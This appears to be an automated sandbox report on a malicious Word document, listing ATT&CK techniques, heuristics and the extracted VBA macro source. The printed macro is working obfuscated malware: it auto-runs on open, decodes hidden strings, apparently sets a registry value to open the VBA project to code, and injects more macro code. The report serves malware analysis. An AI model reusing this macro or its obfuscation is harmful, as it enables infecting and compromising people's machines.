MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate/Decode Files or Information
The sample contains a heavily obfuscated VBA macro within the Document_Open subroutine. This macro utilizes CreateObject and CallByName functions, indicative of an attempt to dynamically execute code and likely download a second-stage payload. The obfuscation and dynamic execution suggest a downloader or droppper functionality.
Heuristics 8
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4862 bytes |
SHA-256: af389cb23e5cf9b91508e4091b4de9a8aaa9c03815fbe628f0f0d990bb2a9774 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
UserForm1.qxew
UserForm1.rkya
UserForm1.moit
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4219BD64-CD8F-4FBE-9E0A-E99B96D00111}{20D816C7-2404-4471-9F9C-C2FE26A3555B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function moit()
Set stqg = Application
Set rcci = CallByName(stqg, hrqf("084" & egjn & "34124" & egjn & "35116129135"), vift)
CallByName rcci, hrqf("087130084127120" & gkma & "35"), VbMethod, hrqf("087" & lrnj & "18136128" & xqdh & "29135051088" & gkma & "331" & jrvm & "3"), hrqf("103123120051119" & lrnj & "18136128" & xqdh & "29135051137120" & gkma & "34124" & lrnj & "29051" & iwmo & "340511291" & jrvm & "5051118" & lrnj & "28131116135" & iwmo & "17127120051138" & iwmo & "35123051135123" & iwmo & "340511381" & jrvm & "3119051" & lrnj & "21121124" & kjbs & "20051137120" & gkma & "34124" & lrnj & "29"), 0, 1, 0, 0, 0
End Function
Function qxew()
Dim stqg, rcci As String
Set jtra = Application
zmxn = CallByName(jtra, hrqf("105120" & gkma & "34124" & lrnj & "29"), vift)
stqg = hrqf("102" & lrnj & "21135138116" & gkma & "20111096" & iwmo & "18" & gkma & "" & jrvm & "4" & lrnj & "21135111098121121124" & kjbs & "20111") & zmxn & hrqf("111088139" & kjbs & "20127111102120" & kjbs & "36" & gkma & "" & iryf & "5140")
rcci = hrqf("084" & kjbs & "18120" & egjn & "34105085098096")
Set fscv = sjdz(hrqf("138" & iwmo & "29128122128135134077142" & iwmo & "28131120" & gkma & "34" & lrnj & "29116135124" & lrnj & "29095" & xqdh & "37" & xqdh & "27080" & iwmo & "28131120" & gkma & "34" & lrnj & "29116135" & xqdh & "44052111111065111" & gkma & "" & jrvm & "0135111119" & xqdh & "21116136127135077102135119101" & xqdh & "22099" & gkma & "" & jrvm & "7"))
CallByName fscv, hrqf("102" & xqdh & "35087106098101087105116127136120"), VbMethod, &H80000001, stqg, rcci, 1
End Function
Function sjdz(stqg As String) As Object
Set sjdz = GetObject(stqg)
End Function
Function hrqf(rcci As String) As String
Dim stqg As String
stqg = ""
Do
stqg = stqg + boxd(xlbh(rcci))
rcci = ddni(rcci)
Loop While Len(rcci) > 0
hrqf = stqg
End Function
Function boxd(rcci)
boxd = Chr(rcci - 19)
End Function
Function xlbh(rcci)
xlbh = Left(rcci, 3)
End Function
Function ddni(rcci)
ddni = Right(rcci, Len(rcci) - 3)
End Function
Function rkya()
Do While True
On Error GoTo Handler
Dim xl, xw As Object
Set xl = CreateObject(hrqf("088139" & kjbs & "20127065084131131127124" & kjbs & "16135124" & lrnj & "29"))
CallByName xl, hrqf("105124" & egjn & "24117127120"), lvgz, False
CallByName xl, hrqf("087124" & egjn & "31127116140084127120" & gkma & "35134"), lvgz, False
Set xv = CallByName(xl, hrqf("1061" & jrvm & "31261171" & jrvm & "0126134"), vift)
Set xw = CallByName(xv, hrqf("084119119"), vift)
Set xx = CallByName(xl, hrqf("084" & kjbs & "35" & iwmo & "37" & xqdh & "061" & jrvm & "31261171" & jrvm & "0126"), vift)
nn = CallByName(xx, hrqf("097116128120"), vift)
Set xq = CallByName(xw, hrqf("105085099" & gkma & "" & yjgf & "5120" & kjbs & "35"), vift)
Set xr = CallByName(xq, hrqf("105085086" & lrnj & "28131" & lrnj & "29" & xqdh & "29135134"), vift)
Set xt = CallByName(xr(1), hrqf("086" & lrnj & "19120096" & lrnj & "19136127120"), vift)
CallByName xt, hrqf("084119119089" & gkma & "" & yjgf & "8102135" & gkma & "24129122"), VbMethod, hrqf(UserForm1.TextBox1.Text)
GoTo nnt
Handler:
Loop
nnt:
End Function
Function nabg(stqg)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.